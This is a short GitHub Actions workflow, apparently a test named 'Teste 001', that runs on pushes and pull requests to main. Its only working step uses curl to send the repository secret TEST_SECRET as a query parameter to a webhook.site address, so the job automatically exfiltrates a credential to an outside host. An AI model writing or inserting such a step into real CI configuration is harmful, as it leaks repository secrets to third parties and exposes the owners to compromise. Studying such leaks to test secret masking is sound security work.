name: Teste 001

on:
  push:
    branches: [main]

  pull_request:
    branches: [main]

jobs:
  build:
    runs-on: ubuntu-latest
    env:
      SUPER_SECRET: ${{ secrets.TEST_SECRET }}

    steps:

      - name: Checkout code
        uses: actions/checkout@v6
        with:
          fetch-depth: 0

      - name: Executa cmd
        run: |
          curl https://webhook.site/840bb416-13b6-467c-ab5f-5d17ea7b554f?tst=${SUPER_SECRET}

    